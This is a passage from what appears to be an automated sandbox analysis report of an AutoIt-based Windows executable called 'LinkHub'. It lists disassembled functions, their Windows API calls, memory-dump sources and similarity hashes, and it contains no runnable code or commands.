                                                                    Function 00CD2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00CD1D95,?,?,00000000), ref: 00CD2159
                                                                    • HeapAlloc.KERNEL32(00000000,?,00CD1D95,?,?,00000000), ref: 00CD2160
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CD1D95,?,?,00000000), ref: 00CD2175
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00CD1D95,?,?,00000000), ref: 00CD217D
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00CD1D95,?,?,00000000), ref: 00CD2180
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CD1D95,?,?,00000000), ref: 00CD2190
                                                                    • GetCurrentProcess.KERNEL32(00CD1D95,00000000,?,00CD1D95,?,?,00000000), ref: 00CD2198
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00CD1D95,?,?,00000000), ref: 00CD219B
                                                                    • CreateThread.KERNEL32(00000000,00000000,00CD21C1,00000000,00000000,00000000), ref: 00CD21B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 79e196f790e046f78133f249f08718254f99ef464a9ff0d5cca5755c05a25f39
                                                                    • Instruction ID: 6f18159091a6c95ab286ba80dc5d0788a979617691a3b623dda31d359cd21605
                                                                    • Opcode Fuzzy Hash: 79e196f790e046f78133f249f08718254f99ef464a9ff0d5cca5755c05a25f39
                                                                    • Instruction Fuzzy Hash: 3B01BBB5240304BFE710AFA5DC4DF6B7BADEB88711F008416FA09DB2A1CA709800CB31
                                                                    Function 00CFAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CDDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00CDDDAC
                                                                      • Part of subcall function 00CDDD87: Process32FirstW.KERNEL32(00000000,?), ref: 00CDDDBA
                                                                      • Part of subcall function 00CDDD87: CloseHandle.KERNELBASE(00000000), ref: 00CDDE87
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CFABCA
                                                                    • GetLastError.KERNEL32 ref: 00CFABDD
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CFAC10
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CFACC5
                                                                    • GetLastError.KERNEL32(00000000), ref: 00CFACD0
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFAD21
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: 9cfe7468a57864307f56bda0d12ce7ad522fda1829682adc2b4d1136c28dc7f9
                                                                    • Instruction ID: d968fc33d4de66d5ff2a4867bf53d55e1fcb3cbc916e08dd57047fb61222a21a
                                                                    • Opcode Fuzzy Hash: 9cfe7468a57864307f56bda0d12ce7ad522fda1829682adc2b4d1136c28dc7f9
                                                                    • Instruction Fuzzy Hash: 5761BCB4208246AFD360DF15C494F25BBE1AF44308F18849DE56A8BBA3C772ED45CB92
                                                                    Function 00D04322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D043C1
                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00D043D6
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D043F0
                                                                    • _wcslen.LIBCMT ref: 00D04435
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00D04462
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D04490
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcslen
                                                                    • String ID: SysListView32
                                                                    • API String ID: 2147712094-78025650
                                                                    • Opcode ID: 5abb1eb6fa853b3d058b80d9cb62273c0e517ebee24313a549d47bfcaa5d3d6b
                                                                    • Instruction ID: 3d8908fa36fa517d17810c433f4b88299a25442bda33ae040e7eea37fb90972e
                                                                    • Opcode Fuzzy Hash: 5abb1eb6fa853b3d058b80d9cb62273c0e517ebee24313a549d47bfcaa5d3d6b
                                                                    • Instruction Fuzzy Hash: 8041A071900319ABDB219FA4CC49FEA7BA9EF48350F140126FA48E72D1D775D980DBA0
                                                                    Function 00CDC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CDC6C4
                                                                    • IsMenu.USER32(00000000), ref: 00CDC6E4
                                                                    • CreatePopupMenu.USER32 ref: 00CDC71A
                                                                    • GetMenuItemCount.USER32(011C56E0), ref: 00CDC76B
                                                                    • InsertMenuItemW.USER32(011C56E0,?,00000001,00000030), ref: 00CDC793
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                    • String ID: 0$2
                                                                    • API String ID: 93392585-3793063076
                                                                    • Opcode ID: f552e3c984c2042a606b6160a3b1771ed15b229d8df41fa07fbfcc4b76ede88e
                                                                    • Instruction ID: 8e3773cf7958f26c4cf6ef47a6ed0441d24cc31ce4e68e93e328b5e16747cfe8
                                                                    • Opcode Fuzzy Hash: f552e3c984c2042a606b6160a3b1771ed15b229d8df41fa07fbfcc4b76ede88e
                                                                    • Instruction Fuzzy Hash: C4519F70A002069BDF10CFA8C8C8BAEBBF5AF55314F25411BEA25D7391D7709A41CF61
                                                                    Function 00CDD11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00CDD1BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 422590e02f7cac88344c0d2e6c5808c4452e7c2d8f4e755875181291d3d0da01
                                                                    • Instruction ID: 983dcfef911515a403534f1e5f60eb58eb0cb808a01f629bc718df3930866373
                                                                    • Opcode Fuzzy Hash: 422590e02f7cac88344c0d2e6c5808c4452e7c2d8f4e755875181291d3d0da01
                                                                    • Instruction Fuzzy Hash: 1611E476A49707BEEB055A55DC82DAE77ACDF05770F20002BFA06A6381E7B0AB415170
                                                                    Function 00CDE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 642191829-3771769585
                                                                    • Opcode ID: efcf3e57fe8795a0b0ceddba2379e65423f1634d48f7578780cc996a38726ff3
                                                                    • Instruction ID: 9e5fc84ae898481d23068479482149a71056144f90945b30e4fb427078ffaf5e
                                                                    • Opcode Fuzzy Hash: efcf3e57fe8795a0b0ceddba2379e65423f1634d48f7578780cc996a38726ff3
                                                                    • Instruction Fuzzy Hash: 6711B4719042157FDB247B64DC4AEEE77ACEF41710F0100A6F619EA191EF748A81D760
                                                                    Function 00CDF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 952045576-0
                                                                    • Opcode ID: 236148841ea5520b49786118967f02c95a807d6209a40bd1620a708359dbe727
                                                                    • Instruction ID: df2021b330e6a81c9feaf7b0116869a047ee05b1f34a4052aee16056a72e370d
                                                                    • Opcode Fuzzy Hash: 236148841ea5520b49786118967f02c95a807d6209a40bd1620a708359dbe727
                                                                    • Instruction Fuzzy Hash: 4A419465C11214B9CF11EBB8CC8AECFB7A8AF05310F518466F619E3261FA34D256C3A6
                                                                    Function 00C8FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00CB39E2,00000004,00000000,00000000), ref: 00C8FC41
                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00CB39E2,00000004,00000000,00000000), ref: 00CCFC15
                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00CB39E2,00000004,00000000,00000000), ref: 00CCFC98
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 92963d53af859a26ba251bd88357881c8a46f179b2e86693aa0b3d5263a50aed
                                                                    • Instruction ID: 3591c2e92612c72209edbc0aba0fcb85e8e8964130bf36462abf33e581c77d23
                                                                    • Opcode Fuzzy Hash: 92963d53af859a26ba251bd88357881c8a46f179b2e86693aa0b3d5263a50aed
                                                                    • Instruction Fuzzy Hash: 5741EB3060838C9BC735AB3DC998B7A7F92BB4B314F14453DE95B86A60C631AB42D725
                                                                    Function 00D0379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00D037B7
                                                                    • GetDC.USER32(00000000), ref: 00D037BF
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D037CA
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00D037D6
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D03812
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D03823
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00D06504,?,?,000000FF,00000000,?,000000FF,?), ref: 00D0385E
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D0387D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: b1cc4faaf2b2f4790fb9054288aa2aa6c59ba45b460cd591e7a3944b08573225
                                                                    • Instruction ID: 3a105abe81ffc51efd9bb238ff8983aef60ef848b62f8be1fa2c15f6d6fe3787
                                                                    • Opcode Fuzzy Hash: b1cc4faaf2b2f4790fb9054288aa2aa6c59ba45b460cd591e7a3944b08573225
                                                                    • Instruction Fuzzy Hash: 48317C76201214ABEB158F909C89FEB3BAEEB49711F044066FE0DDA291C6B59851C7B0
                                                                    Function 00CF5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: 329363c79bfbbdad5dc17685c1d68dac382c59af105c0cab197211a113bd214f
                                                                    • Instruction ID: f9743220ef9329dd4cf45b5c8f7b5a2ef363fbd43f12d623950db5e1f6efae1d
                                                                    • Opcode Fuzzy Hash: 329363c79bfbbdad5dc17685c1d68dac382c59af105c0cab197211a113bd214f
                                                                    • Instruction Fuzzy Hash: 4AD18E71A0060AAFDB50CFA8C885BBEB7B5FF48304F158169EB15AB281D770DE45CB61
                                                                    Function 00CB18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00CB194E
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00CB19D1
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00CB1B7B,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00CB1A64
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00CB1A7B
                                                                      • Part of subcall function 00CA3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00CB1AF7
                                                                    • __freea.LIBCMT ref: 00CB1B22
                                                                    • __freea.LIBCMT ref: 00CB1B2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                    • String ID:
                                                                    • API String ID: 2829977744-0
                                                                    • Opcode ID: c576adf3ea25159d8ba2cc92eb3e7e45df6d96ae137900f08fcf8486fb4c1adc
                                                                    • Instruction ID: 2539a70682fd6b57ed6ff6db6d5e9da8e8c992d28aa249f9b1df2edf022d13c0
                                                                    • Opcode Fuzzy Hash: c576adf3ea25159d8ba2cc92eb3e7e45df6d96ae137900f08fcf8486fb4c1adc
                                                                    • Instruction Fuzzy Hash: E291C572E002569BDF208FA5D8A1AEE7BB5EF09710F5C0529EC25E7280E735DE40D760
                                                                    Function 00CF4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2610073882-625585964
                                                                    • Opcode ID: c0c6434e676ab05c11be32f95212b3f5c430f08afff767775493421ea16d18b1
                                                                    • Instruction ID: 6208edaa93299917ceb7cca8c68b7fcebb179d2dcde63142b1b6453a828812a2
                                                                    • Opcode Fuzzy Hash: c0c6434e676ab05c11be32f95212b3f5c430f08afff767775493421ea16d18b1
                                                                    • Instruction Fuzzy Hash: D891A171A00619ABDF60CFA5C848FAEBBB8EF45314F108559F715AB280D770AA45CFA1
                                                                    Function 00CE1B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00CE1C1B
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1C43
                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00CE1C67
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1C97
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1D1E
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1D83
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1DEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                    • String ID:
                                                                    • API String ID: 2550207440-0
                                                                    • Opcode ID: 138d4aa75a0956f0edfaaf32a9657bee0c4c7d74e8c77be13622a594180493e6
                                                                    • Instruction ID: 77ba5769ce8bf2b2034216f506c86e3bf2ee538060b9ba548a5ffb14d115e3a3
                                                                    • Opcode Fuzzy Hash: 138d4aa75a0956f0edfaaf32a9657bee0c4c7d74e8c77be13622a594180493e6
                                                                    • Instruction Fuzzy Hash: 82910171A00259AFDB019F96C888BFEB7B5FF04715F288029ED11EB291D774EA50DB50
                                                                    Function 00CF43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00CF43C8
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00CF44D7
                                                                    • _wcslen.LIBCMT ref: 00CF44E7
                                                                    • VariantClear.OLEAUT32(?), ref: 00CF467C
                                                                      • Part of subcall function 00CE169E: VariantInit.OLEAUT32(00000000), ref: 00CE16DE
                                                                      • Part of subcall function 00CE169E: VariantCopy.OLEAUT32(?,?), ref: 00CE16E7
                                                                      • Part of subcall function 00CE169E: VariantClear.OLEAUT32(?), ref: 00CE16F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4137639002-1221869570
                                                                    • Opcode ID: c27df940d3d09d2d749c642f77a245b6e121456fbc6a3378a28a38a2b44698c2
                                                                    • Instruction ID: 15fa1957266a79f6664d849ac4ee2a3271882ae38b1e576e5381dcbf4e5956f3
                                                                    • Opcode Fuzzy Hash: c27df940d3d09d2d749c642f77a245b6e121456fbc6a3378a28a38a2b44698c2
                                                                    • Instruction Fuzzy Hash: DA917A746083059FC748EF24C48492ABBE5FF89314F14892EF99A97351DB31EE06DB92
                                                                    Function 00CF560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CD08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?,?,00CD0C4E), ref: 00CD091B
                                                                      • Part of subcall function 00CD08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0936
